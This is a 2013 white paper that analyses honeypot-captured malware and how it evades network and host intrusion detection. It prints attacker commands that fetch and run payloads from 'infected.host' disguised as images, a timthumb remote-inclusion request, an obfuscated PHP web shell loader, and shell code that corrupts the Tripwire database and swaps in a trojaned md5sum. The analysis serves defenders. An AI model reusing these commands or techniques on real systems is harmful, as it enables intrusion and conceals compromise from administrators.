Tricks of the Trade How Malware Authors Cover Their Tracks

A look at how malware attempts to evade intrusion detection and prevention systems

The data within this white-paper is for informational and educational use only. The author is not responsible for any use or misuse of the information herein. Misuse of the information in this whitepaper could lead to severe legal consequences. 9/21/2013 Ken Buckler Caffeine Security http://caffeinesecurity.blogspot.com

Tricks of the Trade - Page 1

Table of Contents
Introduction................................................................................................................................................3 What you will learn......................................................................................................................3 What you should know.................................................................................................................3 Malware authors code with intrusion detection in mind..............................................................3 Defeating Network-based Intrusion Detection...........................................................................................3 Fake file extensions......................................................................................................................3 Fake file headers..........................................................................................................................5 Code Obfuscation.........................................................................................................................6 Defeating Host-based Intrusion Detection and Anti-virus.........................................................................8 Attacking the IDS or Anti-virus Directly.....................................................................................8 Attacking File Integrity Checking Software Such as Tripwire....................................................8 Conclusions..............................................................................................................................................10

Tricks of the Trade - Page 2

Introduction
As security applications evolve to detect more advanced malware, the authors of said malware must adapt and develop new tricks to avoid detection. Fake file headers, fake file types, and fake obfuscated code are just a few tricks which malware authors employ to avoid detection by network and host based intrusion detection systems.
What you will learn...

How malware authors hide from network and host based intrusion detection systems How to de-obfuscate malicious code How malware installation scripts can reveal a lot about the underlying malware

What you should know...

Basic coding principles Basic familiarity with PHP, Perl, and Linux shell scripting Basic familiarity with file types and file headers

Malware authors code with intrusion detection in mind

In today's corporate and government sector, signature-based anti-virus programs will provide little to no protection against advanced persistent threats targeted towards an organization. All modern defensein-depth strategies will include network-based and host-based intrusion detection systems, such as Snort or Tripwire. In order to gain access, attackers must carefully craft their malware to bypass these systems, and avoid alerting administrators that an intrusion was successful. The following are excerpts from real malware captured during attacks on SSH-based and web-based honeypots.

Defeating Network-based Intrusion Detection

Fake file extensions

Using fake file extensions is one of the oldest tricks used by malware authors. A common technique is to rename a compressed archive file to an image extension, such as jpg or gif. The commands in Listing 1 were issued to a Linux SSH-based honeypot after successful cracking of the postgres account password.

Tricks of the Trade - Page 3

Example 1: Use of a fake file extension to bypass network-based intrusion detection localhost:~$ uname -a Linux localhost 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux localhost:~$ passwd Enter new UNIX password: Retype new UNIX password: passwd: password updated successfully localhost:~$ cd /tmp localhost:/tmp$ wget infected.host/bmoshu.jpg localhost:/tmp$ tar zxvf bmoshu.jpg <file decompresses> localhost:/tmp$ cd god localhost:/tmp/god$ ./autorun At this point the malware fails to run because this is not a real system. This confuses the attacker, and he tries again with a different piece of malware. localhost:/tmp/god$ cd .. localhost:/tmp$ rm -rf * localhost:/tmp$ wget infected.host/make.jpg localhost:/tmp$ tar zxvf make.jpg <file decompresses> localhost:/tmp$ cd psybnc localhost:/tmp/psybnc$ make Once again the malware fails to run. The attacker becomes frustrated and exits. localhost:/tmp/psybnc$ cd .. localhost:/tmp$ ls psybnc localhost:/tmp$ uname -a Linux localhost 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux localhost:/tmp$ who 10:39:03 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT postgres pts/0 88.191.160.75 10:31 0.00s 0.00s 0.00s w localhost:/tmp$ exit Connection to server closed. So what's the solution to this method of bypassing detection? Network-based intrusion detection systems should not only check file extensions, but also file headers, to make sure an image file being Tricks of the Trade - Page 4

downloaded really is just an image file.

Fake file headers

Knowing that many network-based intrusion detection systems are looking at file headers as well as file types, the next logical step in the evolution of advanced malware is to introduce fake file headers. In this attack, a GIF file header (as well as other obfuscation) is used to prevent network-based intrusion detection systems from noticing the attack against a PHP based web server. The attacker sends the following command to a suspected vulnerable PHP script: GET /wp-content/themes/TheStyle/timthumb.php? src=http://infected.host/x/vera.php When examining the resulting file which is injected by vera.php, the file contains the correct header for a GIF89a format file. However, beyond the file header is PHP code which may be processed and executed on the vulnerable server.

Figure 1: Vera.php viewed in a hex editor

Clearly, simply looking at file headers still is not sufficient. Network-based intrusion detection systems must also look at file content, scanning for known malicious functions or system calls. Tricks of the Trade - Page 5

Code Obfuscation

Example 2: Vera.php in Obfuscated format GIF89a#?#??????????!??##????,????#?#??##D#?;?<?php $language = 'eng'; $auth = 0; $name = ''; // md5 Login $pass = ''; // md5 Password /***********************************************************/ error_reporting(0); $rhs = '7b17e9pVsjj89+Zs8h0UHZ8Bcz[...content removed...]zrEjLQSnlx1v5/'; eval(gzinflate(str_rot13(base64_decode($rhs)))); ?> Continuing to examine vera.php, it is discovered that basic obfuscation is performed against the code. This obfuscation is quite simple to defeat when examining the malware, so why does the attacker bother to do this?

The purpose of the code obfuscation is not to prevent analysis of the malware, but to prevent networkbased intrusion detection systems from detecting the underlying malware code. By implementing multiple mathematically complex operations, most network-based intrusion detection system will fail to parse the malicious code before it's already been executed on the target host. The biggest downfall of network-based intrusion detection systems is that the systems must process requests in a timely manner so that end users are not impacted. This obfuscated code can be quite easily examined by simply stepping through the code (see Example 3).

By de-obfuscating vera.php, what was once a 47kb, 11 line GIF file becomes a 156kb, 3289 line PHP script designed to give an attacker complete control over the target system. The first several lines are shown in Figure 2.

Tricks of the Trade - Page 6

Example 3: De-obfuscating Vera.php In this example we'll work with only the first and last few characters of the code. $rhs = '7b17e9pVsjj89+Zs8h0UHZ8Bcz[...content removed...]zrEjLQSnlx1v5/'; eval(gzinflate(str_rot13(base64_decode($rhs)))); Writing this without nested function calls: $rhs = '7b17e9pVsjj89+Zs8h0UHZ8Bcz[...content removed...]zrEjLQSnlx1v5/'; $rhs = base64_decode($rhs); $rhs = str_rot13($rhs); $rhs = gzinflate($rhs); eval($rhs); The real malware code can be obtained by looking at the value of $rhs instead of evaluating it. $rhs = 'error_reporting(0);@ini_restore("safe_mode");@ini_restore("op[. ..content removed...])'

Tricks of the Trade - Page 7

Figure 2: Vera.php De-Obfuscated

Most intrusion detection systems will have difficulty determining what is contained within the encrypted code, because of the complexity of analyzing it. Instead, intrusion detection systems must perform a sanity check. For example, should a file with a GIF header really contain PHP code in the first place?

Defeating Host-based Intrusion Detection and Anti-virus

Attacking the IDS or Anti-virus Directly

One of the major downfalls of any host-based intrusion detection system is that the software must reside locally on the system. If a system is completely compromised, any intrusion detection software will be susceptible to manipulation and attack. This can be performed by simply terminating known IPS and Anti-virus services once the malware has obtained elevated privileges.
Attacking File Integrity Checking Software Such as Tripwire

An interesting method of attacking IDS software observed in the wild is a very low-tech attack against Tripwire. In this attack, the hacker simply corrupts the local tripwire database to avoid detection. Example code for this attack is featured in Example 4.

Tricks of the Trade - Page 8

Example 4: Attacking Tripwire First the malware checks to see if Tripwire is installed on the system echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire... $ {RES}" uname=`uname -n` twd=/var/lib/tripwire/$uname.twd if [ -d /etc/tripwire ]; then echo "${WHI} ALERT: TRIPWIRE FOUND! ${RES}" If Tripwire is installed, the malware corrupts the database by overwriting the Tripwire database with a fake error message. if [ -f /var/lib/tripwire/$uname.twd ]; then chattr -isa $twd echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwiredatabase... ${RES}" echo "${RED} ALERT! tripwire database found ${RES}" echo "${DCYN}[${WHI}sh${DCYN}]# ${WHI} dun worry we got handytricks for this :) ${RES}" echo "-----------------------------------------" > $twd echo "Tripwire segment-faulted !" >> $twd echo "-----------------------------------------" >> $twd echo "" >> $twd echo "The reasons for this may be: " >> $twd echo "" >> $twd echo "corrupted disc-geometry, possible bad disc-sectors" >> $twd echo "corrupted files while checking for possible change etc." >> $twd echo "" echo "pls. rerun tripwire to build the database again!" >> $twd echo "" >> $twd else echo "${WHI} lucky you: Tripwire database not found. ${RES}" fi else echo "${WHI} guess not. ${RES}" fi If a system administrator blindly trusts that Tripwire encountered an error, he/she will simply rerun Tripwire and rebuild the database, allowing Tripwire to trust the malware infected files.

Tricks of the Trade - Page 9

Commonly accompanying attacks on Tripwire are attacks against administrators who might use md5 to keep an offline copy of file hashes. The attack involves recording the md5 has of key system files which the attacker wishes to replace with malware infected executables. if [ -f /sbin/ifconfig ]; then /usr/bin/md5sum /sbin/ifconfig >> .shmd5 fi After the hashes have been recorded, the attacker replaces the md5sum tool with their own, written to provide the recorded md5sum if it exists. He/she even backs up the original file in case something goes wrong. chattr -isa /usr/bin/md5sum cp /usr/bin/md5sum $BACKUP mv -f md5sum /usr/bin/md5sum chattr +isa /usr/bin/md5sum Now if the system administrator runs the md5sum tool against one of the infected files, the md5 hash returned by the infected version of the tool will remain unchanged from the original.

Conclusions
The perpetual cat-and-mouse game of malware evading detection has no end in sight. As attackers' techniques are discovered and detection signatures created, the attackers adapt and come up with new techniques to evade detection. Intrusion detection systems are not, and never will be, a silver bullet to address our cyber security issues. Only through layered security, defense-in-depth, and following security best practices can an organization hope to thwart would-be attackers.

About the Author

Ken Buckler is a computer security consultant. He currently holds CompTIA Security+ and CompTIA Advanced Security Practitioner (CASP) certifications. Over the years working for various contractors, he has provided services for clients such as Defense Information Systems Agency and the United States Department of Veterans Affairs. All of the malware featured in this white-paper was gathered through the use of his own personal honeypots. The data contained within this white-paper is in no way related to or endorsed by his employer or clients. For additional samples' analysis visit: https://code.google.com/p/caffsec-malware-analysis/ Tricks of the Trade - Page 10